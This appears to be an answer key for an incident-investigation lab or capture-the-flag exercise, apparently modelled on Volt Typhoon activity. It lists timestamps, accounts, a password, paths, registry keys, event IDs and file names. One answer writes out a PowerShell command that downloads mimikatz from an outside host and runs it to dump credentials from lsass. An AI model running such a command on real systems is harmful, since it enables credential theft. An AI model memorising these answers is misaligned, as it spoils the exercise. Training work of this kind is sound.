1. No answer needed
2. 1. 2024-03-24T11:10:22
   2. voltyp-admin
3. 1. wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename
   2. d5ag0nm@5t3r
4. C:\Windows\Temp\
5. 1. Remove-ItemProperty
   2. cl64.gif
   3. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
6. 1. OpenSSH, putty, realvnc
   2. Invoke-WebRequest -Uri "http://voltyp.com/3/tlz/mimikatz.exe" -OutFile "C:\Temp\db2\mimikatz.exe"; Start-Process -FilePath "C:\Temp\db2\mimikatz.exe" -ArgumentList @("sekurlsa::minidump lsass.dmp", "exit") -NoNewWindow -Wait
7. 1. 4624 4625 4769
   2. AuditReport.jspx
8. 2022.csv 2023.csv 2024.csv
9. 1. 10.2.30.1 8443
   2. Application Security Setup System
